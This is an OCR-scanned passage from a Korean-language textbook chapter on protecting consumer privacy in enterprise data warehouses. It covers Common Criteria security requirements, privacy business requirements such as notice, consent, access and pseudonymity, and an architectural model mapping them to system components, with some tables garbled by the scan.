러나 보안령역에서는 악의 있는 행동 또는 다른 사람의 행동과 관련한 모든 위협들에 대 
하여서만 깊은 주의 가 돌려 진다. 
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공통기준구조는 론리적인 전진에 따른다. 먼저 보안환경이 서술되고 그 다음 제시된 
보안환경에 기초하여 보안목표가 결정된다. 정보보호와 관련한 보안환경의 특징，보안목 
표，보안봉사요구，보안기 능요구에 대 한 상세한 설명 은 표 32—2에 요점적 으로 주었 다. 

표 32-2 보안요구 (ISO 15408)/ 공동평가기준 ( CB 1) 


보안환경 

o 전제: 전제요소의 서술은 소비자환경의 보안측면을 서술하기 위 하여 필요하다. 여기에 
는 물리적인 측면，직원측면 및 접속측면과 같은 환경리용에 대한 정보뿐아니라 응용 
의 의도적 인 리용, 잠재적 인 자산가치，가능한 리용제한과 관련한 정보들이 포함된다. 

O 위협: 이 요소는 위협 인자，추측되는 공격 방법，있을수 있는 취약성，보존된 자산식별 
告의 용어들로 특징 짓는다. 

o 기관의 보안방책: 이 요소에는 정의된 환경과 관련하여 결정되는 임의의 그러 ; a .모든 
법，기관보안방책과 관례, IT 공정들이 포함된다. 

보안방책의 위협과 전제만을 고려한다면 기관의 보안방책에 대한 서술을 생략할수도 있다. 

보안목표 

보안목표는 위협식별，소비자기관의 방책，환경전제들을 검토한다. 보안목표를 결정하는 의도 
는 공학적인 견해，보안방책，경제적인자，위험허용도결정들과 결합된 처리에 기초하여 보안 
관련 문제 를 처 리 하는데 있 다. 

• 합법 적리 용: 정 보가 비 법사용자에 의해 또는 부당한 방법 으로 리용되 지 않는다는것 
을 보증한다. 

• 비 밀성: 정보가 비합법적 인 사용자에게 로출되거나 제공되지 않는다는것을 보증한다. 

• 자료무결성: 자료의 일관성，비법적인 창조，변경，삭제들의 방지를 보증한다. 

• 유효성: 자료와 봉사가 필요한 경우에 접근가능하다는것을 보증한다. 
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보안봉사요구 

보안목표에 맞게 보안봉사모임 또는 절차들이 요구된다. 보안봉사는 6개의 부분 즉 인증，접 

근조종，비밀성，무결성，속성，리용성 으로 나누어 진다. 

• 인중: 사용자 또는 체계가 누구인가를 확인하는 봉사. 인증봉사는 통과암호，통표， 
생체계측정보(례컨대 지문)，암호화 등을 리용하여 진행될수 있다. 

• 접근조종: 사용자，콤퓨터체계, 공정들이 해당한 권한과 목적에 맞게 자원(파일，등 
록부，콤퓨터，망)을 리용할수 있게 하는 봉사. 접근조종절차는 신원형접근조종(례컨 
대 UNIX 보호비트，접 근조종목록)，표식형접근조종(즉 위 임접근조종) 또는 규칙형접 
근조종(신원과 표식의 결합 그러고 체계특권에 의하여 실행)으로 수행될수 있다. 접 
근조종은 비 법적리용의 보호와 비밀성 및 무결성보호를 제공하는데서 중요한 역 할 
을 한다. 

• 비밀성: 민감한 개인정보를 비법적인 공개로부터 보존하는 봉사. 비밀성봉사는 모 
든 암호화를 리용하여 진행 된다. 

• 무결성 : 자료，콤퓨터 프로그람，체 계 자원 이 그대 로 존재하며 비 합법 적 인 사람，쏘프 
트웨어，를퓨터환경 에 의하여 수정 될 수 없 다는것 을 확인 하는 봉사. 자료무결 성 을 보 
증하는 절 차에 는 순환여유검 사，검 사합，암호화가 포함된 다. 또한 체 계무결성 을 보 
증하는 절차에는 물리적인 보호，비루스방지쏘프트웨어，보안된 설치절차，구성조종 
등이 포함된다. 

• 권능: 체계에 대하여 수행된 작용이 그것을 수행하는 개체에 귀착되며 이러한 작용 
을 부인하는 개인 또는 체계가 없다는것을 확인하는 봉사. 권능을 제공하는 절차에 
는 검 열，암호화，수자식서명 이 포함된다. 

• 리용성 : 체 계，응용，자료가 필요한 경 우 유용하다는것을 보증하는 봉사. 이 를 위하 
여서는 안전이 요구되는 자료와 중요한 체 계봉사들에 해 당한 대 책을 취 함으로써 정 
확하고 완성된 정보에 기초하여 권한이 부여된 개인들에게 유효한 IT 봉사가 진행된 
다는것을 담보하여 야 한다. 임의의 사적비밀보호구조에서 중요한 요구사항은 중요 
한 자료와 봉사가 언제 나 유효하다는것을 보증하는것 이 다. 유효성 을 제공하는 절차 
에 는 고장회 복콤퓨터，비 루스방지 쏘프트웨어， RAID 기 억 들이 포함된다. 

보안기능요구 

공동기준 2는 정보의 발견，비법러용의 보호와 관련하여 4가지 계렬의 용어로 분류한다. 

• 닉명: 닉명은 사용자가 자기의 신원을 밝히지 않고 지원 또는 봉사를 사용할수 있 
다는것을 보증한다. 닉명은 사용자신원의 보호를 제공하기 위하여 요구된다. 닉명은 
인증되여야 하는 신원에 대한 보호는 제공하지 않는다. 

• 가명: 가명은 사용자가 자기의 신원을 밝히지 않고 자원 또는 봉사를 사용하지만 
그 리 용을 책 임질 수 있 다는것 을 보증한다. 

• 비련결성: 사용자는 다중련결에 구애됨이 없이 자원 또는 봉사를 다중사용할수 있 
다. 

• 비관측성: 사용자는 자원과 봉사가 리용되고 있다는것을 조사할수 있는 제3자와 같 

_ 은 기 타 문제들에 구애됨 이 없이 지원 또는 봉사를 사용할수 있다. _ 
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이 장의 나머지 부분에서는 회사들이 기업운영에서 산업환경에 맞게 개 인적 인 정보 
의 비공개성과 비밀성을 보증하는 보안체계를 실시하고 있다는것을 전제로 한다. 사적비 
밀에 대한 끊임없는 요구사항으로서의 보안식별을 제외한 다른 문제들은 더 이상 고찰하 
지 않겠다. 자료보관고에서 보안이 실현되고 사적비밀이 없어 진다는것 이 앞으로 언급될 
수 있다. 그러나 이러한 환경에서도 보안기능이 없이 사적비밀을 가질수는 없다. 

규범의 해명 

사적 비 밀 방책 을 안내 하는 규범 들은 정 부기 관，회 사와 시 장부문기 관，소비 자들을 포함 
한 각이한 방책들로부터 엄 어 진다. 

정부규범은 립법기관과 조정기관에 의하여 우선적으로 정의되고 실시되며 정부기구 
들에 의하여 변경된다. 실례로서 현재 유럽동맹에 의하여 통과된 유럽지시를 들수 있다. 
회사와 부문규범은 특정한 시장부문을 구성하는 기업 또는 이러한 시장들과 관계되는 정 
부기관들에 의하여 정 의 될 수 있 다. 실 례 로서 1995년 에 발표된 소비 자독점 망통신을 조절 
하는 원격통신개정법안을 들수 있다. 

소비자규범은 개인들에 의 하여 정의된다. 실례로서 전화하드복사전자우편을 통하여 
시 장광고를 수신하기 위한 선택안을 들수 있 다. 다른 실례 는 계 3자에 게 제 공하지 않은 
개 인자료를 가지 기 위한 선택안이 다. 개 인들이 사적 비 밀선택안이 나 규정 을 서 술할수 있 
게 함으로써 매 소비 자에 대 한 규범 의 무결성 과 신용성 을 유지한다. 

기 업 문 제 


앞에서 설명한 사적 비 밀 문제 는 간단히 다음의 기 업문제서 술로 요약된다. 

회사는 개인정보가 어떻게 수집되고 리용되는가를 고려하여 소비자들의 기대와 국내 및 
국제법들을 준수하면서 자기 소비자들과 거래할 필요가 있다. 

이 장의 다음 부분에서는 기업씨나리오를 조사하여 기업전망으로부터 사적비밀을 가 
능하게 하는 문제들을 고찰한다. 씨나리오를 시행할 때 발견되는 기업요구사항들은 체계 
구조와 기 술결 정 을 끌어 내 기 위하여 포착되 고 리 용된 다. 사적비 밀 인 식 과 민 감성 에 대 한 
추가적 인 기 업 요구사항들은 기 존법 적문건과 대 중의 요구로부터 엄 어 진다. 사적 비밀과 
관련한 기 업요구사항을 구체 적 으로 해 명하는것은 소비 자의 사적 비밀을 밀착시 킨 구조모 
형을 창조하는데 도움이 된다. 

사적비밀들 담보하는 기업환경 

기 업 씨 나리오는 기 업 환경 의 간략서 술과 씨 나리오에 동반되 는 관계 자들，관계 자들사 
이의 거래 등을 포함한다. 그림 32 — 2는 회사인 경우 소비자의 사적비밀을 보증하는 기 
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• 사적 비 밀 방책 은 정 부，부문，소비 자의 규칙 에 의 하여 규정 된 다. 

• 사적 비 밀 방책 은 자료기 지 의 정 보구조，설 계，메 타자료봉사와 통합된 다. 

• 사적 비 밀 방책 은 거 래 의 시 작에 앞서 어 떤 시 점 에 서 소비 자에 의 하여 표현된다. 


소비:화 _ 보관고 또는 은행 



기업분석 


그림 32-3. 소비자의 사적비밀을 가능하게 하는데 
동반되는 기업거래 

소비자거래 

소비 자와 업무제 공자사이 에 협 약된 계 약은 소비 자가 업 무제 공자와의 업무거 래 에서 
최종적으로 진행되는 거래에 대하여 자발적으로 그리고 빈름없이 약속될 때 보통 접수된 
다. 계 약은 다음의 동의를 포함한다. 

• 업무에 요구되는 개 인자료를 보장한다는 소비 자의 동의 

• 계 약리행 을 위하여 일정한 기 간동안 소비 자의 개 인자료를 어 떤 형 식 으로 보관하 
고 리용하며 유지 한다는 업 무제 공자의 동의 

소비자는 기업의 신용이 담보되고 서로의 리득 또는 식별의 필요성이 있는 관계에서 
추가적인 개인자료(요구되는 목적외에)의 공유를 요구한다. 공유된 자료의 량과 형태는 
소비자의 선택안과 기 업요구를 명백히 반영하고 포함하여 야 한다. 

자료적재 

기업은 소비자의 거래와 업무를 수집하고 조사하여 무엇이 발생하는가를 반드시 결 
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정하여야 한다. 이것은 법률, 기업，통화，재정，경쟁 그리고 합법적인 기업기능을 위하여 
필요한 다른 측면으로부터 수행될수 있다. 력대적으로 전형적인 보관고소유자들과 은행 
가들은 자기 소비자들의 움직임과 선택안들을 반드시 기억해 두고 그에 따라 거래를 계 
속 수정하였다. 그리고 큰 회사들은 자료보관고와 갈은 현대적인 도구들의 도움으로 자 
기의 자료기지에 적재된 지난 시기의 거래와 업무에 대한 수집을 통하여 자기 소비자들 
의 움직임과 선택 안들을 기 억하였을것 이 다. 

정보처리 

기업이 일단《무엇이 일어 났는가》를 확정한 다음의 론리적인 단계는《그것이 왜 
일어 났는가》를 알아 내는것이다. 기업들은 거래와 업무에 관한 정보처리에 많은 도구 
들을 리용한다. 이러한 도구들은 소비자의 움직임과 선택안들을 직관적으로 분석하는데 
도움을 준다. 그리하여 최종적으로 회사의 목적과 목표에 맞게 최적방향을 선택하여 더 
큰 효과성을 달성할수 있도록 기업운영을 진행할수 있게 한다. 그러나 회사의 간파력이 
소비자들의 사적비밀선택안에 따라 서지 못한다면 소비자들은 자기들의 개인자료가 기업 
의 정보처리에 리용되는것을 환영하지 않을것이다. 

자료재취 

기업이 《무엇이 일어 났는가》，《그것이 왜 일어 났는가》를 확인한 다음에는《무 
엇 이 일어 나겠는가》를 예견하기 위하여 자료채취와 분석모형화와 갈은 도구와 기술들 
을 채용한다. 이러한 분석에서는 거래와 업무에 필요한 기업자금과 함께 외부원천으로부 
터 엄는 가능한 추가정보까지 고려한다. 이때 기업은 이러한 외부정보원천들이 합법적이 
며 제공하는 정보들이 정확하다는것，그리고 개인식별자료들이 포함되여 있는 경우에는 
소비자들로부터 인정을 받고 있는가를 보증하여야 한다. 분석결과에 얻어 진 예측모형 이 
소비 자레 코드에 적 용되 여 소비 자획 득，소비 자보유，소비 자증가와 관련 한 앞으로의 움직 임 
을 예상한다. 이 모형을 또한 신용，협잡，풍족，다른 기업조건들의 영향을 결정하는데도 
리용할수 있다. 

행위추적 

소비 자의 사적 비 밀을 가능하게 하는 기 업 씨 나리 오의 마지 막단계 는 예 측모형 결과에 
기초하여 실제적인 대책을 취하는것이다. 이러한 대책안들은 법에 위반되거나 소비자의 
선택안을 무시하지 말아야 한다. 사적비밀을 고려하는것은 기업움직임에 강한 영향을 미 
치며 기업운영능력이 떨어 지지 않도록 하면서 사적비밀을 조정하여야 하는 부담，소비 
자선택안을 구체적으로 리해하고 반응해야 하는 문제들로 하여 기업운영과 밀접히 련관 
되여 있다. 

요약하면 소비자자료를 조종하고 보관하며 처리하는 기업거래를 통하여 자료를 검사 
하여 그 변화를 사적비밀이 어떻게 자기 기업안에서 실행될것인가를 결정한다. 법 또는 
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소비 자의 사적 비밀선택 안에 어긋나게 대책을 취함으로써 기업을 보호하는것은 계 약리행 
이 아니다. 


사적비밀담보를 우 I 한 기업요구사항 


사적비밀을 보호하는 법적문건개발은 정부의 엄격한 관계와 자체조정방법사이에서 
변동한다. 자료보호에 대한 기초원리를 확립한 자발적인 지침이 경제협력개발기구 
( OECD ) 의 성원국들에 의하여 1980년에 채택되였다. 이 지침은 개인들에 대하여 수집된 
개 인관계 자료에 관심 이 있는 개 별적 인 시민들의 권리 를 인정 하고 개 인관계 자료를 구성하 
는 파라메터들을 정의하는 법적문건의 채택과 실천을 촉진시켰다. 

많은 착상들이 이미 Online Privacy Alliance 파 유럽동맹지시기사의 《중요요소》들과 
함께 경제협력개발기구 ( OECD ) 의 지침에 서술된 사적비밀조항들에 포함되여 사적비밀요 
구사항에 대한 포괄적인 표로 작성되였다. 이 장에서는 제안된 6개의 사적비밀요구사항 
들과 련관된 두가지 요구사항들을 요점적으로 개괄한다. 이러한 요구사항들은 체계구조 
에 적용될 때 매 체계 에 대 한 사적 비밀조정의 영 향을 결정하는데 도움이 된다. 

사적 비밀과 관련한 기 업 요구사항에 는 통지，선택/동의，접 근，보안，제 한，회 계가능성， 
추적가능성，닉 명/가명 의 개 념 들이 포함된다. 

통지 회사는 자기의 소비자들에게 개인자료가 수집되며 어떠한 자료가 수집되는가 
그리고 이러한 자료가 어떻게 리용되며 어떻게 발표되는가 하는것을 그들이 쉽게 리해할 
수 있도록 통지를 제공할수 있어 야 한다. 통지서 에 는 자료수집자와 의도하는 다른 자료 
수신자의 신원，자동처리에 동반되는 론리에 대한 정보들이 포함된다. 

선택/동의 회사들은 자기의 소비 자들에 게 특정한 개 인자료항목의 선택 또는 제거를 
할수 있는 합리적인 선택기능을 제공할수 있어야 한다. 이러한 자료들은 회사의 기업운 
영 에서 사법권과 산업 환경요구에 맞게 수집 되 고 리용되며 발표되 여 야 한다. 

점근 회 사들은 자기 들이 수집 하고 리용하며 발표하는 개 인자료들이 정 확하며 최 신 
의것이라는것을 자기의 소비자들에게 보증할수 있어야 한다. 접근성에는 개인들이 부정 
확하거 나 또는 불충분한 개 인자료를 조사하는 수단 그리 고 지 역법의 규칙 에 따라 수집되 
지 않은 자료에 대한 접근 막기 또는 제한 권한이 포함된다. 

보안 회 사들은 자기 의 소비 자들에 게 자기 들이 수집 하고 리용하며 발표하는 개 인자 
료들이 분실되거나 비법접근，파괴，변경，리용，발표에 대하여 안전하다는것을 보증하여 
야 한다. 

제한 회사들은 개인자료의 수집과 리용이 명백히 규정된 합법적인 목적을 위해서만 
진행되며 초기목적의 수행을 위하여 필요한 기간동안만 규정된 형 태로 보존된다는것을 
자기의 소비자들에게 보증할수 있어 야 한다. 

회계가능성 회 사들은 자기소비 자들이 제 정된 사적 비 밀원리 와 실 천을 위 반할 때 그 
에 대 한 해결책 을 찾고 교정할수 있도록 어떤 절차를 세울수 있어 야 한다. 회 계가능성 에 
는 기존법과 조절구제법，자기의 주제와 관련한 개인자료수집을 계획한 매개 나라에서 
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사적비밀권한에 대한 통지서 등의 실시에 대한 지원이 포함된다. 

추적가능성 회사들은 조정자들에게 모든 거래와 처리들이 추적가능하며 내부평가 
또는 제 3자에 의한 평 가를 허 용하는 방법 들에 의하여 경 과기 록된 다는것 그리 고 론증하는 
소비 자들이 사적 비밀방책 에 따른다는것 을 보증할수 있어 야 한다. 이것은 국가안전보관소 
제안에 추종하는 소비자들에게 있어서는 특별히 중요하다. 

닉명/가명 회사들은 자기의 소비자들에게 개인자료가 닉명 또는 가명상태로 유지되 
여 개인들이 선택할수 있으며 후에 개인을 목표로 리용될수 없다는것을 보증할수 있어야 
한다. 

요구사항들 구조적인 요소로 넘기기 

그림 32—2와 그림 32 — 3에서 조사한 기업환경과 기 업씨나리오는 소비자와 회사사이 
의 관계를 묘사하고 있다. 구조적으로 보면 3개의 요소들이 소비자의 사적비밀을 보증하 
는데 영향을 주는 기본부분이라는것을 설명하고 있다. 즉 표현 또는 사적비밀요소와 사 
적비 밀을 보증하는 기 업론리 그리 고 사적비 밀 자료이 다. 

사적 비 밀 표현은 소비 자거 래 에 서 《 창문》으로 봉사하며 소비 자와 관리 자 그리 고 조 
작장치 와 열 람기 등을 포함한다. 사적 비밀을 보증하는 기 업론리 에 는 기 업거 래，업무，변 
환，분석 및 관리 등이 포함된 다. 사적비 밀 자료에 는 자료보관고만아니 라 응용내 부 또는 
더 작은 자료기지에 보관된 중간자료보관고에 대한 문의와 검색，다른 자료관리조작들이 
포함된다. 


표 32-3 소비자의 사적비밀을 보증하는 기업요구사항을 구조적인 요소로 넘기기 



사적 비밀 표현 

사적비밀을 보증하는 

기업 론리 

사적비밀자료 

통지 

Q 

i 決 


선택 

O 

分 

•讀 " 

접근 



■ ： 0- 

보안 

- 起:.' | 

分 

公 

제안 


分 

%.； 

회 계 가능성 


分 


추적 가능성 


■ S ：- 

公 

닉명 


分 

•• 


표 32_3에 서 보는바와 같이 우에 서 설명한 8개의 사적 비 밀과 관련한 기 업 요구사항 
들은 이 3개의 구조적인 요소들에 영향을 준다. 표에서 표는 소비자의 사적비밀을 보증하 
는 요구사항이 구조적인 요소에 대하여 실행된다는것을 표시한다. 실례로 통지요구사항 
은 사적비밀표현과 기업론리요소에 대하여 실행되며 사적비밀자료요소에 대한 실행은 요 
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구하지 않는다. 이미 설명한바와 같이 보안은 소비자의 사적비밀보증을 위하여 요구된다. 
그러므로 보안은 모든 구조적인 요소들에 대하여 실행되여야 한다. 

소비자의 사적비밀들 보증하는 구조모형 

기업요구사항을 구조적인 요소로 넘기는것은 기술적인 선택의 평가에 앞서 기업고려 
사항에 의하여 먼저 실현을 조사할수 있게 한다. 그림 32_4에서 보여 준 구조적 인 모형 
은 이러한 넘기기를 그라프적으로 설명하고 있다. 

모형은 사적 비밀표현요소를 통하여 각이한 류형의 대면부로 소비 자의 기 업체계 와 거 
래 할수 있는 각이한 류형의 사용자들을 보여 주고 있다. 이 러한 사용자들에는 소비 자，조 
작자와 관리자，사적비밀검열자가 포함된다. 또한 사용자에는 사람을 대신하여 조작기능 
을 수행하는 응용과 대 리국들도 포함된다. 모형 은 또한 기 업 론리 요소에 영 향을 주는 사 
적비밀규칙의 원천들 즉 정부，산업/부문，소비 자들도 보여 주고 있다. 또한 보안을 위한 
요구사항이 어떻게 소비자의 사적비밀을 보증하는데 영향을 주는 모든 업무과정들을 포 
함하는가 하는것 도 설 명한다. 



모형 은 사적 비 밀 표현과 기 업론리 요소가 둘다 통지 와 자료수집 을 동반하는 선택/동의 
그리고 자료수집을 동반할수도 있고 동반하지 않을수도 있는 접근과 갈은 요구사항들을 
처 리할수 있 는 부분요소들을 포함할 필 요가 있 다는것 을 보여 준다. 또한 시 간/리용제한과 
닉 명/가명 과 같은 요구사항들도 기 업론리 와 사적비 밀 자료요소가 둘다 포함된 부분요소를 
가질 필 요가 있 다는것 을 설 명한다. 

모형 은 앞으로 3개 의 모든 구조적 요소들의 추적가능성 에 대 한 요구사항을 취 급하기 
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위하여 부분요소를 포함할 필요가 있다는것을 보여 준다. 이것은 기업에 의하여 정의된 
회 계 가능성 절 차에 대 한 요구사항을 지 원하는 경 우에 도 같이 요구될것 이 다. 

거래할 때 회사들은 사적비밀방책통지서를 보내는 외에 소비자들이 다음의 문제들을 
규정할수 있게 하여야 한다. 

• 계약된 기업협정범위를 벗어 난 목적에 대하여 추정할수 있는가 없는가. 

• 계약된 기업협정범위를 벗어 나 어떤 자료를 공유하려고 하는가. 

• 계약된 기업협정범위를 벗어 나 어떤 정황에서 자료를 공유하려 하는가. 

• 만일 어떤 자료가 있다면 그것을 보유하려 하는가 또는 팔려고 하는가. 

기업을 운영할 때 회사들은 다음의 기능들을 허락할수 있어야 한다. 

• 소비자가 자기의 개인자료를 조사할수 있다. 

• 소비자가 틀린 자료를 수정할수 있다. 

• 소비자가 닉명으로 거래 할수 있다. 

• 회사가 개인자료보호를 승낙하는가를 조정자가 조사할수 있다. 

분석 할 때 회사는 다음의 항목들에 따를수 있어 야 한다. 

• 보유주기 에 대 한 조정 안 

• 권한이 있는 리용에 대한 조정안 

• 닉명규칙 

• 자료보유 또는 판매에 대한 소비자규칙 

사람들은 흔히 사적비밀을 조종하는 가장 좋은 위치는 접근시점이라고 생각한다. 그 
러나 저자들은 사적비밀을 조종하는 가장 좋은 위치는 개인식별정보에 대한 리용규칙이 
철저히 실현될수 있는 자료보관고라고 생각한다. 

사적비밀을 보증하는데서 요구되는 기능들과 그것을 구조적인 모형에 어떻게 귀착시 
키는가 하는데 대 한 문제들은 이 장의 다음 부분에서 상세 히 설명 한다. 


기술적인 문제 


소비자의 사적비밀을 보증하는 기술적인 문제는 현재의 기술에서 소비자의 투자와 
기 업환경의 급속한 변동，이미 알려 진 기술，표준전개 등의 문제로 하여 매우 복잡하다. 
기술문제에 대한 다음의 언급은 이러한 우려사항을 보여 준다. 

회사들에는 이미 알려 진 사적비밀요구사항을 유지하면서 사적비밀규칙의 변경에 대한 
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를 발견할 때 나타나는 기업요구사항들은 앞으로 이러한 요구사항에 맞주는 
가능，처리，기술들을 식별하기 위하여 구체적으로 조사된다. 기업요구사항들 
과 함께 구조에 영향을 주는 기술요구사항들의 형식화에 도움을 주는 기술결 
게 된다. 

사적비밀들 담보하기 우 I 하여 요구되는 기능 

표 32 — 4는 사적비밀을 보증하는 매 기업요구사항을 실현하는데 필요한 자 J 
기 능들을 설 명한다. 이 기 능들에 적 용되 는 현재 그리 고 이 미 알려 진 기 술 
다. 표에서는 이러한 해결을 주장하는 항목들은 밑선으로 표시하였다. 


표 32-4 사적비밀보증을 우 I 하여 요구되는 기능 



필요한 기능 

필요한 

자료류형 

기 술 


싸•적 비밀방책을 통보한다. 

o 회사의 개인비밀 

O 문서형과 Web 기 반장치， 


淨 임의의 《자료처리》에 대한 설명 

보장방책 

。특정한 장치，공중전화픽 


을 포함한다. 


m i 스크■립 트_ 


ᄊ■ .설 비 를 추적하는 자료리 용 (IT 체 계 


o 메 타자료보관고(사적 비밀 


의 종점사이에서 자료리용을 추적 

하기 위하여 ) 


자료의 리용을 문서화) 


연시 되 여 야 할 특정한 자료요소들 

o 개인선택안의 

O 문서형과 Web 기 반장치， 


을 식별한다. 이러한 요소들은 변 

선택항목 

。특정한 장치，공중전화픽 


경될수 있는데 누구에 의한 변경인 

O 개인선택안의 

。 자료보관고를 동반하는 


가를 식별한다. 

현재 설정 

경우 사적비밀에 대한 


'개 인선택안에 대 한 선택 항목/현재 

ᄋ 회 사의 개 인 비 밀 

MDIS 이 다. 

7 

설정을 표현한다. 

보장방책 규정 

[藏」자료보관고를 동반하지 

I 

개 인선 택안설 정 을 만들거 나 변 경 

% 사적비밀메타 

레인 경우 사적비밀에 t 


한다. 

자료 

은 P 3 P 이다. 


개 인 선 택 안설 정 을 협 상(선 택 적 이 

。협상규칙 

° 자료를 수집 /갱신 하는 디 


다)한다. 


자대면부 


_，개인선택안설정변경을 약속하거나 


o 스크립트 


인정 한다. 


O 자료기지접근 


연시 되 여 야 할 특정한 자료요소들 

O 개인선택안의 

。 W 的기반장치，규약, 증명 


을 식별한다. 이러한 요소들은 변 

현재 설정 

ᄋ 특정한 장치，공중전화픽 







O 자료수집 /갱 신 하는 다마 
대면부 
크■립 트_ 

자료기지접근(창조，삭; 
삭제) 

。 업무무결성(자료기지갱 
성을 담보하기 위하여) 


《법적문건에 맞는 목: 
증하는 응용론리가 실행 
기업은 자동처리를 없 
여 수동적이며 자동적인 
을 처리한다. 

자료보관고를 동반하- 
경우 《자료기지보기》' 
용제한에 의하여 조종된 
자료보관고를 동반하지 




• 체 계 에 문의 하여 수정 한다. 

•부인방지능력 

O 개인선택안의 

현재 설정 

0 조종자 및 처리 

자 식별 

사적 비 밀 기 록 

보관고 

대한) 


_추적가능성을 관리하기 위한 구조 
와 증명요구사항 

:0 경과기록사건발생, 경고，례외 
경과기록을 조사하고 각이한 자료 

봉사들사이를 융합시킬수 있는 사 

용자대면부 

«보고서발생 

0 사적비밀의 고수/승인을 위한《설 

비 추적》 

경과기록기능을 수행하고 경과기 
록자료를 보호 

_.'奸•성조종과 관련한 경과기록을 형 
성 

ᄋ 회 사의 사적 비밀 

보장방책규칙 

O 개인선택안의 

현재 설정 

0 사적비밀기록 

보관고 

_추적가능성을 가능하거 
조선택에 따라 여러가7 

° 응용실 행환경 의 기 록 (_ 
록을 준비하고 전송한^ 

7 

[ 

_巧닉명(리용에 적용될 때 식별자가 
없다). 

• 개인식별자료를 막거나 떼버리거 

나 가려 낸다. 

.가명(자료수집에 식별할수 없는 이 

름을 배당한다. 그러므로 원천을 

찾을수는 있다. ) 

• 적당한 조종을 할수 있는 가명을 

발생 한다. 

» 리용되는 개인 

선택안 설정 

보유하는 개인 

선택 안설정 

O 자료보관고를 동반하- 

경우 《 자료기지》는 

조종 한다. 

자료보관고를 동반하지 

래인 경우 보관절차는 

조종 한다. 

가명발생자 


사적비밀들 담보하는 기술전망 


기술관점은 기 업목표의 초점과 기능 또는 성능과 갈은 다른 질적속성들에 - 
한 속성들은 각이한 기준에 따르는 기 업환경으로부터 특정세부들을 추상화경 
한 체계관점이 얻어 진다. 매 관점들은 요소， 호상관계，지침의 의미에서 독 
할수 있다. 그러나 체계의 관점은 독립적이 아니다. 

소비자의 사적비밀을 담보하자면 기존구조의 변경이 요구된다. 그러나 완격 



장의 다음 부분에 서 는 기 능과 성 능，리용성/신뢰 성， OA & M (운영，행 정，관리)관점 들을 설 
명 한다. 

기능적인 관점 기능적인 관점은 구조모형에서 구별되는 매 요소들의 표현과 통신， 
자료흐름，처리에 대한 구조적인 관점을 제시한다. 구조요소내에서 제시된 기능들은 사적 
비 밀을 보증하는 구조작성블로크들을 포함한다. 

사적비밀표현요소 그림 32 — 5는 소비 자의 사적 비 밀을 보증하는 기 업요구사항을 지 
원하기 위하여 사적비밀표현요소안의 필요한 기능들만을 보여 준다. 5개의 기능적인 구 
조작성 블로크들이 정 의 된다. 



그림 에서 왼쪽에 있는《 인증 및 권한부여》블로크는 보안요구사항을 리행하는데 필 
요한 인증 및 권한부여기능을 나타낸다. 《개인자료와 사적비밀선택안에 대한 추적활 
동》블로크는 추적가능성과 회계가능성의 요구사항을 리행하는데 필요한 개인자료와 사 
적비밀선택안에 대하여 수행되는 추적활동기능을 나타낸다. 나머지 3개의 블로크들은 사 
적비밀보장방책통지서와 선택/동의 그리고 개인자료와 사적비밀선택 안의 접근과 관련한 
사적 비 밀 요구사항을 리행하는데 필 요한 기 능들을 나타낸 다. 

다음으로 사적비밀표현요소를 통한 자료흐름을 설명하자. 초기통신은 어떤 류형의 
《사용자》(사람，대리자 또는 다른 응용)와 대방《사용자》대면부사이에 사적비밀표현요 
소의 실행으로 일어 난다. 이때 사용자에게는 하드복사우편소책자，전자우편 ， HTTP 또는 
다른 기 능을 포함한 여 러 가지 절 차를 통하여 사적비 밀 보장방책 에 대 하여 이 미 통지 되 였 
거나 또는 통지되지 않았을수도 있다. 일단 사용자가 인증되여 사적비밀표현요소에 접근 
할수 있는 권한을 가지 면 사적 비 밀 표현을 포함하여 개 인 자료를 얻 거 나 이 동，리용하는 
모든 활동은 기록되고 감시된다. 

사적 비밀표현요소는 사적 비밀을 보증하기 위하여 기 업론리를 실행하는 요소와《 사 
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용자》사이에서 개인자료와 사적비밀선택안을 송수신하는 기능을 수행한다. 또한 이 
《사용자》가 개인자료와 사적비밀선택안을 조사하고 수정할수 있게 하는 기능도 실행한 
다. 이러한 조사와 수정은 앞으로는 동적으로 진행되여야 한다. 그러나 현재는 어떤 류형 
의 문서형보고갱신절차를 통하여 이러한 기능들을 수행하는것이 더 좋을것이다. 

자동체계인 경우 사적비밀선택안은 주기적으로 규정되며 소비자들이 기업과 거래할 
때 마다 유지된다. 후자의 경 우에 프로그람가능 Web 대 리 자는 사적 비 밀선택 안을 규정 하고 
유지하는 여유처리가 쉽게 되는 절차를 리용하여야 한다. 사적비밀표현기능중에서 통신 
을 위하여 권고된 표준은 HTTP 와 P3P 이 다 (P3P 에 대 한 Web 기 반의뢰기의 위 치는 제 일 많 
이 변경되 였 다. 그러 나 류형 과 사적비 밀 자료요소를 정의하는 류형 과 형 식은 다른 조작환 
경에 맞게 확장되였다). 

사적 비 밀 표현 기 능과 사적 비 밀 을 보증하는 기 업 론리 를 실 행 하는 기 능사이 에 서 통신을 
중재하는 위 치는 마이크로쏘프트의 통보문봉사 (MSMQ)， 마이크로쏘프트의 객체요구매개 
자의 구조 (COM/DCOM) 또는 Web 기반봉사 (HTTP, P3P) 이다. 산업용대면부는 
COMZDCOM(DNAf) 의 제일 웃준위에 적용된다. 

사적비밀을 보증하는 기업론리의 요소 그림 32 — 6은 소비자의 사적비밀을 보증하는 
기 업요구사항을 지 원하는 기 업론리 요소내 에 서 필요한 기 능들을 보여 준다. 4개 의 기 능적 
인 구조작성블로크가 정 의된다. 그림 에서 첫 3개 의 블로크들은 사적 비 밀 방책의 통지서와 
선택/동의 그리 고 개 인자료와 사적 비 밀 선택 안의 접 근에 필 요한 사적 비 밀 요구사항을 리 행 
하는데 요구되는 기능들을 나타낸다. 특히 이 기능들은 사적비밀방책을 유지하고 기업을 
위한 사적비밀규칙 을 실시한다. 제 일 아래 있는 블로크는 개 인자료와 사적 비 밀선택안에 
대하여 수행되는 추적활동기능들을 나타낸다. 이러한 기능들은 추적가능성과 회계가능성 
의 요구사항을 리행하는데 필 요하다. 

다음令 사적비밀을 보증하는 기업론리요소를 통하여 자료흐름을 설명한다. 개인자료 
와 사적 비밀선택안을 엄거 나 이동하거 나 리용하는 모든 활동은 기 록되며 감시된다. 



그림 32-6. 소비자의 사적비밀을 보장하는 기업들의 요소내에서의 기능들 
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기 업 론리 요소는 사적 비 밀표현과 사적 비밀 자료요소사이 의 개 인자료와 사적 비 밀선택 안 
과 관련한 요구와 응답을 차지하는 기능들을 실행한다. 이러한 요구와 응답을 처리하는 
부분으로서 기업론리요소는 또한 기업규칙과 정부，산업/부문，소비자의 사적비밀규칙에 
관한 원천으로부터 유래되는 사적 비밀규칙을 실시 하는 기능들도 실행 한다. 

